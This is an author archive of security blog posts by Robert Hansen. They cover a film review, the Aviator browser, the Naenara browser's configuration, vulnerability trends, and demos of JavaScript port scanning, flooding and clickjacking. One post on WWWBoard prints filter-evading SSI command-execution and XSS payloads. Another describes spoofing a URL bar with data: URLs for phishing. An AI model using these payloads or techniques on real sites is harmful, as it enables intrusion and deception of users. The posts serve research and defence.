Author Archives: Robert Hansen

About Robert Hansen

Robert Hansen is the Vice President of WhiteHat Labs at WhiteHat Security. He's the former Chief Executive of SecTheory and Falling Rock Networks which focused on building a hardened OS. Mr. Hansen began his career in banner click fraud detection at ValueClick. Mr. Hansen has worked for Cable & Wireless doing managed security services, and eBay as a Sr. Global Product Manager of Trust and Safety. Mr. Hansen contributes to and sits on the board of several startup companies. Mr. Hansen has co-authored "XSS Exploits" by Syngress publishing and wrote the eBook, "Detecting Malice." Robert is a member of WASC, APWG, IACSP, ISSA, APWG and contributed to several OWASP projects, including originating the XSS Cheat Sheet. He is also a mentor at TechStars. His passion is breaking web technologies to make them better. Robert can be found on Twitter @RSnake.

The Imitation Game – A Review

Warning: Spoiler alert!

I went to go watch “The Imitation Game” this weekend, on a bit of a whim. I know Alan Turing’s story rather well – having spent a lot of time in computer security will do that to you. Overall I thought the movie was really good – the acting, writing, and overall historicity were all very good.

Pros:

  • The movie spent a lot of time talking about his personal life, and what lead up to his suicide. I’d argue that this was as much a movie about the father of computers as it was about the historical (and unfortunately current) marginalization and criminalization of homosexuality.
  • I was impressed how the movie explained how reduction of keyspace works in rather plain english and simple examples. The math might be improbably difficult for the average person, but they managed to make it accessible.
  • They mention the Turing test – though thankfully there were no CAPTCHAs in sight.
  • The movie spent quite a long time explaining why you cannot use a single signal to make any decisions or the adversary will switch tactics and you’ll lose that one signal. I try to make this point all the time and yet I still people doing things like blocking countries at the firewall by IP address. If you are in security, and you take nothing away from this movie, let it be this – do not use a single signal to identify and stop fraud/hacking. You’re hurting the ecosystem by doing so. Yes, you.

There were a couple cons though… Some cons that actually made me cringe.

Cons:

  • At one point in the movie Alan Turing made the bear in the woods joke. Just about the time my eyes started rolling the audience burst into laughter – at this point I realized I was extremely jaded and should probably learn to live a little, hug a tree, run like a child or generally do something other than wince at old security jokes. But the reason I hate this joke is that is presumes that you can leave the woods once the bear has eaten your friend. Unless you plan to close up shop and leave the Internet, this analogy has always been a very dangerous one. Bears get stronger, and will get hungry again, and if you’re relying on running faster than an adversary who is dead you’re using the wrong analogy. I prefer the prairie dog analogy if you’re looking for silly analogies.
  • A big motivator throughout the movie was that at the end of the day a buzzer went off that meant that the Nazis had changed their encryption keys. So yesterday’s keys were “useless” and anything they had done had to be scrapped if they couldn’t complete it by midnight. Though it’s an interesting plot device it really doesn’t work that way. Decryption doesn’t stop at the end of the day, just because your key changes. If the adversary has the ciphertext and there is nothing ephemeral about the key, it can still be decrypted. Now if you’re going to make the point that the data loses value the longer it takes to decrypt – yes, I’m on board with that. But the movie didn’t explain that at all.
  • They don’t really talk about Turing’s other accomplishments, like the Turing Halting problem – which more or less describes the problem with blacklists and all kinds of other technologies. As a student of breaking crappy blacklists, this is one of his most useful accomplishments to my daily life. I really wanted to hear them mention it at least once, like they did with the Turing test. Alas!

I’d also point out that there were some other controversies about the historical accuracy as well that didn’t jump out at me as I watched it. Anyway, it was a really wonderful movie, despite the cons. I’d highly recommend it to people who want to know a bit more about our roots, and get a bit more familiarity with some of the core concepts that have brought us to where we are today. I love that we’re seeing more movies about real heroes and not the typical hollywood-manufactured superhero.

Aviator Open Source (Day 1)

We got some interesting feedback from Google in just the first 24 hours of open sourcing Aviator to the community. Interestingly, one of our initial barometers of success was getting to the point where Google had to talk about us, so today was a milestone for us!

The post makes some interesting points around the architecture of our fixes, pointing out that we are behind Google in patches and the fact that there are software security issues. Let me make it clear, we never claimed to be as fast as Google at releasing updates. In fact, that would be nearly impossible for a company of our size. Google gets the benefit of making in excess of $50 billion-a-year from ads by marketing it’s users to advertisers. Therefore, Google has a lot of vested interest in keeping the browser up to par and capable of delivering more ads to those users. To say we are outmatched is an understatement.

We decided to go open source with Aviator and thereby seek assistance from the community. All this being said, we would like to take a moment to respond to some of the points made in the post as well as respond to the advice that was shared:

  1. Yes, there are bugs in our code, just like there were bugs that we inherited from the Chromium code base.
  2. Yes, it is perhaps not an elegant code base like Google Chrome, however Chrome has bugs as well. That’s the nature of such a complex project. The nice thing about bugs is that they can be fixed.
  3. Advising users to not use Aviator misses the bigger picture. To tell people that if they use Chrome, add Disconnect and change some privacy settings you’ll get the same thing as Aviator is not at all accurate. We have made changes in Aviator that are beyond configuration, such as the browser’s ability to stop referring URLs from being sent cross domain as well as always being in private mode by default. But far more importantly, when we talk to average users it becomes clear that consumers can’t actually do what the post is suggesting. Most people do not know the first thing about Disconnect and therefore, they don’t know what they need to do to add it. Our argument all along has been that consumers need better options by default. They don’t even know what to search for to start learning how to protect themselves.

Our reasoning for making Aviator open source was two-fold:

  1. We wanted to be honest with our users and give them a chance to see that we don’t have anything up our sleeves and that we are not (nor were we ever) hiding anything from them. Going open source is painful, but it is good for project transparency, something Google has long refused to do with Chrome. Chrome is not open source.
  2. We wanted to solve Google’s primary issue with us – the lack of development resources necessary to deliver the browser in a timely manner. That’s absolutely a real issue and we have never claimed otherwise. By making it available to the community, we believe that more time and resources will be put towards continuing to improve it and we are excited to see where the community takes it next.

The core issue in all of this is that we set out to create a browser that would provide security and privacy settings by default. We believe that we made very good strides in that effort and when issues around those settings were brought to our attention, we actively made changes, something that Google has been unwilling to do.

I won’t lie, going open source has been hard and only with the help of the community will Aviator continue to improve. It is now up to the community to decide if they’d rather hand over their privacy when they search using other browsers, or stand behind a project that we believe has the user’s best interests as a primary motivator. Only time will tell.

North Korea’s Naenara Web Browser: It’s Weirder Than We Thought

Naenara Browser is the DPRK’s version of Firefox that comes built into Red Star OS, the official operating system of North Korea. I recently got my hands on Naenara Browser version 3.5. My first impression in playing with it is that this is one ancient version of Firefox. Like maybe more than a half dozen major revisions out of date? It’s hard to tell for sure in cursory checking but the menus remind me of something I used to use 5+ years ago. That’s not too surprising; it’s tough to have a browser and update it all the time, especially with such a small team devoted to the project, as I’m sure they have a lot of other things going on.

When I first saw an image of the browser I was awe-struck to see that it made a request to an adddress (http://10.76.1.11/) upon first run. That may not mean much to someone who doesn’t deal with the Internet much, but it’s a big deal if you want to know how North Korea’s Internet works.

If you want to send a request to a web address across the country, you need to have a hostname or an IP address. Hostnames convert to IP addresses through something called DNS. So if I want to contact www.whitehatsec.com DNS will tell me to go to 63.128.163.3. But there are certain addresses, like those that start in “10.”, “192.168.” and a few others that are reserved and meant only for internal networks – not designed to be routable on the Internet. This is sometimes a security mechanism to allow local machines to talk to one another when you don’t want them to traverse the Internet to do so.

Here’s where things start to go off the rails: what this means is that all of the DPRK’s national network is non-routable IP space. You heard me; they’re treating their entire country like some small to medium business might treat their corporate office. The entire country of North Korea is sitting on one class A network (16,777,216 addresses). I was always under the impression they were just pretending that they owned large blocks of public IP space from a networking perspective, blocking everything and selectively turning on outbound traffic via access control lists. Apparently not!

But it doesn’t stop there! No! No sirrreee… I started digging through their configuration settings and here are some gems:

  1. They use the same tracking system Google uses to create unique keys, except they built their own. That means the microtime of installation is sent to the mothership every single time someone pulls down the anti-phishing and anti-malware lists (from 10.76.1.11) in the browser. This microtime is easily enough information to decloak people, which is presumably the same reason Google built it into the browser.
  2. All crash reports are sent to the mothership (10.76.1.11). So every time the browser fails for some reason they get information about it. Useful for debugging and also for finding exploits in Firefox, without necessarily giving that information back to Mozilla – a U.S. company.
  3. All news feeds go back to the mothership in a specially crafted URL: http://10.76.1.11/naenarabrowser/rss/?url=%s At first it was unclear if that actually does anything or not, since we can’t see the IP address, but it looks like it probably does act as a feed aggregator.
  4. Strangely, the browser adds “.com” instead of “.com.kp” as a suffix when the browser can’t find something. It’s odd because this means in some cases this might accidentally be contacting external hosts when someone typos something in the country. A bad design choice, but perhaps meant for usability since most things live on .com.
  5. There are quite a few references to “.php” on the mothership website. I would be unsurprised if most things on it were written in PHP.
  6. Then I spotted this little number: http://10.76.1.11/naenarabrowser/%LOCALE%.www.mozilla.com/%LOCALE%/firefox/geolocation/ This is the warning that pops up when users turn on geolocation. But here’s the really crazy part: if you remove the DPRK specific URL part and just leave it as %LOCALE%.www.mozilla.com/%LOCALE%/firefox/geolocation/ and substitute %LOCALE% with “ko” you end up on Mozilla’s site translated into Korean. Could the mothership be acting as a proxy? Is that how people are actually visiting the Internet – through a big proxy server? Can that really be true? It kind of makes sense to do it that way if you want to allow specific URLs through but not others on the same domain. Hm!
  7. More of the same. This time the safe browsing API that Google supports to find phishing/malware stuff — http://10.76.1.11/naenarabrowser/safebrowsing.clients.google.com/safebrowsing/diagnositc?client=%NAME%&hl=%LOCALE%&site= — if you remove the preceding part of the URL and fill in the variables it’s a real site. And there are a bunch more like this.
  8. Apparently they allow some forms of extensions, plugins and themes, though it’s not clear if this is the whole list or their own special brand of allowed add ons: http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/extensions/ http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/plugins/ http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/themes/

  9. Apparently all of the mail from the country goes through the single mothership URL. Very strange to build it this way, and obviously vulnerable to man in the middle attacks, sniffing and so on, but I guess no one in DPRK has any secrets, or at least not over email: http://10.76.1.11/naenarabrowser/mail/?To=%s I found a reference to “evolution” with regards to mail, which means there is a good chance North Korea is using the Evolution project for their country.

  10. Same thing with calendaring? So many sensitive things end up in calendars, like passwords, excel spreadsheets, etc… it’s still very odd that they haven’t bothered using HTTPS internally: http://10.76.1.11/naenarabrowser/webcal/?refer=ff&url=%s

  11. This one blew my mind. Either it’s a mistake or a bizarre quirk of the way DPRK’s network works but the wifi URL for GEO still points to https://www.google.com/loc/json – not only is there no way for this to work since Google hasn’t gone through the country with their wifi cars, and it’s on the public Internet without going through their proxy of doom, but also it’s over HTTPS, meaning that if it were able to be contacted, the DPRK might have a hard time seeing what is being sent. Would they allow outbound HTTPS? More questions than answers it seems.
  12. The offical Naenara search function isn’t Google, and it’s not even clear if it’s a proxy or not. But one thing makes me think it might be – it’s in UTF-8 charcode, and not something that you might expect like BIG5 or ISO-2022-KR or SHIFT_JIS or something. http://10.76.1.11/se/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&keyword= But wait a tick, after a little digging I found a partial match on the URL: /search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1 and where did I find this? Google. Are they proxying Google results? I think so! That means that depending on what Google can put on those pages, they technically can run JavaScript and read the DPRK’s email/calendars, etc. using XMLHTTPRequest, since they are all on the same domain. Whoops!

  13. In looking around at the certificates that they support, I was not surprised to find that they accepted no other certificates as valid – only their own. That means it would be trivial to man in the middle any outbound HTTPS connection, so even if they do allow outbound access to Google’s JSON location API it wouldn’t help, because the connection and contents can be monitored by them. Likewise, no other governments can man in the middle any connections that the North Koreans have (I’m saying that with a bit of tongue in cheek, because of course they can according to Wikileaks docs, but this probably makes the DPRK feel better — and more importantly they probably don’t know how to do it in the same way as the NSA does, so they have to rely on draconian Internet breaking concepts like this).

  14. The browser automatically updates, without letting the browser disable that function. That’s actually a good security measure, but given how old this browser is, I doubt they use it often, and therefore it’s probably not designed to protect the user, but rather allow the government to quickly install malware should they feel the need. Wonderful.
  15. Even if the entire Internet is proxied through North Korean servers, and even if their user agent strings are filtered by the proxy, an adversary can still identify a user using Naenara by looking at it in JavaScript space using navigator.UserAgent. Their user agent is, “Mozilla/5.0 (X11; U; Linux i686; ko-KP; rv: 19.1br) Gecko/20130508 Fedora/1.9.1-2.5.rs3.0 NaenaraBrowser/3.5b4″ So if you see that UserAgent string in JavaScript you could target North Korean users rather easily.
  16. Although the Red Star OS does lock down things like their file manager that only shows you a few directories, disables the command-O (open) feature, removes the omnibar feature and so on, it’s still possible to do whatever you want. Using the browser users can go to file:/// to view files and they can write their own JavaScript using javascript: directives which give them just about any access they want, if they know what they’re doing. Chances are they don’t, but despite their Military’s best efforts the Red Star OS actually isn’t that locked down from a determined user’s perspective.
  17. Snort intrusion detection system is installed by default. It’s either used as an actual security mechanism as it was designed or it could be re-purposed as a way to constantly snoop on people’s computers to see what they are doing when they use the Internet. Even if it didn’t phone home necessarily, the DPRK soldier who broke down your door could fairly easily do forensics and see everything you had done without relying on any IP correlation at the mothership. So using your neighbor’s wifi isn’t a safe alternative for a political dissident using Red Star OS.

My ability to read North Korean is non-existent, so I had to muddle my way through this quite a bit, but I think we have some very good clues as to how this browser and more importantly how North Korea’s Internet works, or doesn’t work as it might be.

It is odd that they can do all of this off of one IP address. Perhaps they have some load balancing but ultimately running anything off of one IP address for a whole country is bad for many reasons. DNS is far more resilient, but it also makes things slower, in a country with Internet connectivity that is probably already pretty slow. If I were to guess, the DPRK probably uses a proxy and splits off core functions by URL to various clusters of machines. A single set of F5s could easily handle this job for the entire country. It would be slow, but it doesn’t seem the country cares much about the comforts of fast Internet anyway.

Ultimately the most interesting takeaway for me personally was what lengths North Korea goes to to limit what their people get to do, see and contribute to — Censorship at a browser and network level embodied in the OS called Red Star 3.0. It’s quite a feat of engineering. Creepy and cool. Download the Red Star OS here.

Aviator Going Open Source

One of the most frequent criticisms we’ve heard at WhiteHat Security about Aviator is that it’s not open source. There were a great many reasons why we didn’t start off that way, not the least of which was getting the legal framework in place to allow it, but we also didn’t want our efforts to be distracted by external pressures while we were still slaving away to make the product work at all.

But now that we’ve been running for a little more than a year, we’re ready to turn over the reins to the public. We’re open sourcing Aviator to allow experts to audit the code and also to let industrious developers contribute to it. Yes, we are actually open sourcing the code completely, not just from a visibility perspective.

Why do this? I suspect many people just want to be able to look at the code, and don’t have a need to – or lack the skills to – contribute to it. But we also received some really compelling questions from the people who have an active interest in the Tor community who expressed an interest in using something based on Chromium, and who also know what a huge pain it is to make something work seamlessly. For them, it would be a lot easier to start with a more secure browser that had removed a lot of the Google specific anti-privacy stuff, than to re-invent the wheel. So why not Aviator? Well, after much work with our legal team the limits of licensing are no longer an issue, so now that is now a real possibility. Aviator is now BSD (free as in beer) licensed!

So we hope that people use the browser and make it their own. We won’t be making any additional changes to the browser; Aviator is now entirely community-driven. We’ll still sign the releases, QA them and push them to production, but the code itself will be community-driven. If the community likes Aviator, it will thrive, and now that we have a critical mass of technical users and people who love it, it should be possible for it to survive on its own without much input from WhiteHat.

As an aside, many commercial organizations discontinue support of their products, but they regularly fail to take the step of open sourcing their products. This is how Windows XP dies a slow death in so many enterprises, unpatched, unsupported and dangerously vulnerable. This is how MMORPG video games die or become completely unplayable once the servers are dismantled. We also see SAAS companies discontinue services and allow only a few weeks or months for mass migrations without any easy alternatives in sight. I understand the financial motives behind planned obsolescence, but it’s bad for the ecosystem and bad for the users. This is something the EFF is working to resolve and something I personally feel that all commercial enterprises should do for their users.

If you have any questions or concerns about Aviator, we’d love to hear from you. Hopefully this is the browser “dream come true” that so many people have been asking for, for so long. Thank you all for supporting the project and we hope you have fun with the code. Aviator’s source code can be found here on Github. You don’t need anything to check it out. If you want to commit to it, shoot me an email with your github account name and we’ll hook you up. Go forth! Aviator is yours!

#HackerKast 14 Bonus Round: Canadian Beacon – JavaScript Beacon and Performance APIs

In this week’s bonus footage of HackerKast, I showed Matt my new JavaScript
port scanning magic that I dubbed “Canadian Beacon” because it uses the new Beacon API. It was either that or Kevin Beacon – I had to make a tough choice with my puns. It utilizes both the performance API and the beacon API.

It shows how you can use iframes and performance APIs to do basically the same thing we used to be able to do with onload event handlers on iframes of yester-year.

Not a huge deal, because we can do this in a bunch of different ways already, but it shows how easy it is to do JavaScript port scanning; and even if someone bothers to shut one variant down, this and other variants will take their place. This is one of the major reasons Aviator has chosen to break access to RFC1918 from the Internet.

Only a few browser variants are vulnerable, Chrome and apparently Firefox though I only got it working in Chrome. If you want to see a demo you can check out Canadian Beacon here.

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to take a look at their extensive collection of vulnerabilities that they have collected over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the immediate thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid 2000’s. However, one thing I found that struck me as very odd was that we’re starting to see a downward trend in web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are) here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogenous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, people who use it are less likely to switch in favor of something new, which means there are fewer threats to the incumbent code to be replaced, and it’s therefore more likely that new frameworks won’t get adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, therefore obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, Paypal, Facebook), rather than open source code used by many websites. That means they wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves far enough where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their life more difficult than working with the vendors directly or holding onto their vulnerabilities. The presence of more bug bounties, where researchers get paid for disclosing their newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is is an interesting trend and should be watched carefully. It could be a hybrid of a number of these issues as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit that is not expressed in the data above shows that there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning it involves a remote attacker and there is published exploit code) context-dependent attacks (e.g. tricking a user to click a malicious link) are still a leading source of compromise at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common or even more so than they have ever been. Said another way, compromises are flat or even up, and new remotely exploitable web application vulnerabilities being disclosed is down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find though, is that heavy database driven sites will start to falter if they rely on caching to protect themselves. Specifically Drupal sites tend to be fairly prone to this issue because of how Drupal is constructed, as an example.

It works by sending tons of HTTP requests using different paramater value pairs each time, to bypass caching servers like Varnish. Ultimately it’s not a good idea to ever use this kind of code as an adversary because it would be flooding from their own IP address. So instead this is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of the modern day knowledge about web application security against 20-year-old tech? So I took at look at the web-board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beat me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

In taking a quick look there have been a number of vulns found in it over the years. Four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, this has been nearly 12 years since the last CVE was announced.

Sure enough its actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there’s all kinds of ways to sneak things by Perl regex if you allow nulls. But that second string makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS where filters prevented parts of the exploit so you had to break it up into two chunks to be executed together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into it’s required components where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days not to mention Matt’s project is on it’s deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browser more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in places all over the web in long forgotten but still functional code. We’ve inherited a lot of vulnerabilities and our knowledge has substantially increased. It’s really fascinating to see how bad things really were though, and how little security there really was when the web was in it’s infancy.

#HackerKast 11 Bonus Round: The Latest with Clickjacking!

This week Jeremiah said it was my turn to do a little demo for our bonus video. So I went back and I decided to take a look at how Adobe had handled clickjacking in various browsers. My understanding was that they had done two things to prevent users from getting access to the camera and microphone. The first was that they wouldn’t allow you to make it a 1×1 pixel iframe that otherwise hid the permissions dialog.

My second understanding was that they prevented the browser from changing the opacity of the flash movie or surrounding iframe so that the dialog wasn’t obscured from view. So I decided to try it out!

It turns out that hiding it from view using opacity is still allowed in Chrome. Chrome has chosen to use a permissions dialog to prevent the user from being duped, that comes down from the ribbon. That is a fairly good defense. I would even argue that there is nothing exploitable here. But just because something isn’t exploitable doesn’t mean it’s clear to the user what’s going on so I decided to take a look at how I would social engineer someone into giving me access to their camera and microphone.

So I created a small script that pops open the victim domain (say https://www.google.com/) so that the user can look at the URL bar and see that they are indeed on the correct domain. Popups have long been banned but only automatic ones, the ones that are user initiated are still allowed and “pop” up into an adjacent tab. Because I still have a reference to the popup window from the parent I can can easily send it somewhere else, other than Google after some time elapses.

At this point I send it to a data: URL structure, that allows me to inject data onto the page. Using a little trick to make the browser look an awful lot like they’re still on Google makes this trick super useful for phishing and other social engineering attacks, but not necessarily a vuln either. This basically claims that the charset is “https://www.google.com/” followed by a bunch of spaces, instead of “utf8″ or whatever it would normally be. That makes it look an awful lot like you’re still on Google’s site, but you are in fact seeing content from ha.ckers.org. So yeah, imagine that being a login page instead of a clickjacking page and you’ve got a good idea how an attacker would be most likely to use it.

At that point the user is presented with a semi-opaque Flash movie and asked to click twice (once to instantiate the plugin and once to allow permissions). Typically if I were really doing this I would host it on a domain like “gcams.com” or “g-camz.com” or whatever so that the dialog would look like it’s trying to include content from a related domain.

The user is far more likely to allow Google to have access to the user’s camera and microphone than ha.ckers.org, of course, and this problem is exacerbated by the fact that people are accustomed to sites including tons of other domains and sub-domains of other companies and subsidiaries. In Google’s case, googleusercontent.com, gstatic.com etc… are all such places that people have come to recognize and trust as being part of Google, but the same is true with lots of domains out there.

Anyway, yes, this is probably not a vuln, and after talking with Adobe and Chrome they agree, so don’t expect any sort of fixes from what I can gather. This is just how it works. If you want to check it out you can click here with Chrome to try the demo. I hope you enjoyed the bonus video!

Resources:
Wikipedia: Clickjacking

Anonymity or Accountability?

Over a decade ago, when I was just starting in the computer security scene, I went to a conference for managed security services providers as the sole representative for my company. Near the end of the day-long conference there was a large discussion in which people were asked, “If you could change one thing with a magic wand to have the biggest impact on security, what would it be?”

When it finally got to me, I said the only thing that came to mind, “Attribution.” I explained, “If I had a magic wand and could change anything to have the largest impact on security, I’d make it so that everything on the Internet could be attributed to people so that we could have accountability. If you knew the packet you sent would be tagged with the information necessary for someone to track you down, you’d be extremely unlikely to commit any crimes using the Internet.”

I know it’s impossible to do that, but it was a magic wand after all. But that’s not the end of the story. Over the years I have become a privacy “guy” insomuch as I take people’s privacy seriously. However, I also have one foot squarely in the world of banking, finance, retail and so on – where attribution is hugely important for security, and also as an unintended consequence *ahem* marketing. So as much as I’d love to have people live in a free and open society, we all know what a bunch of jerks people can be when they know there’s nothing at risk when they break the law.

On the flip side, 100% attribution is terrible for privacy when you’re not doing anything illegal, or if you are a political dissident. The very last thing our forefathers wanted when they were talking amongst themselves in pubs on the East coast, considering creating a new nation, was attribution. They saw fit to write amendments to the constitution to limit unlawful search and seizures, and to allow freedom of speech.

So on one hand you have freedom and on the other hand you have safety. I have taken to asking people: “If you had to chose only one, which would it be? Accountability or Anonymity? Do you ever want there to be a way for you to do something anonymously or not? Do you ever want to be at risk of not finding someone who had committed a crime or not?”

I am somewhat surprised to find that when given only the choice between one or the other, it has been nearly an even split amongst people I talk to – usually at conference – about which they’d prefer. Right now, we teeter on the brink of having no anonymity at all. With enough vulnerabilities that allow full compromises of millions of machines, and enough listening posts all over the world, anonymity is slowly but surely getting harder and harder to get. Look at the most recent busts of various Tor hidden services like Silk Road 2 – people whose livelihoods and freedom depend on privacy still can’t manage it.

Most people would say that drug dealers and arms dealers deserve to be behind bars, so good riddance, regardless of how it happened. However, what about Colorado? Last year, being in possession of marijuana would land you in jail. This year it won’t. So are we as a society willing to indiscriminately put people in jail for breaking the law, even when the law later turns out to be unjust and/or bad for society?

Or worse yet, what if our government moves into a second age of McCarthyism – where they hunt down those who engage in civil disobedience with untold masses of siphoned information to decide whom to jail and whom to leave alone? What if adultery suddenly became a felony? Thought crimes could be punishable in such a dystopian world — not a pretty sight either. Though your banking passwords would be safe, certainly. (Except from the government.)

Perhaps releasing certain types of criminals or forgiving certain types of crimes, as California is about to do, might be a worthwhile exercise. A certain level of crime, while seemingly bad, is critical to allowing for a free society. It’s a complex issue, and of course there is always a middle-ground, but I think to properly understand the middle ground you have to explore the edges. What would a perfectly accountable Internet bring? It would bring with it a near zero cyber-crime rate but also limited freedoms. What would a perfectly anonymous Internet bring? It would bring unfettered cyber-crime but unlimited freedoms. It feels like you’d want some sort of middle ground, but there’s no such thing as “somewhat anonymous” when your life depends on it.

While my younger self would have said that “attribution” was the key to security, I would now tell my younger self to look beyond security, and really contemplate what a completely secure society would look like. Maybe a completely secure society with attribution for every act isn’t such a great idea after all, I would warn him. There are probably no easy answers, but it’s a conversation that needs to happen.

Assuming for a second that there was only one answer, if you had to chose one, which would it be: anonymity or accountability? And more importantly, why?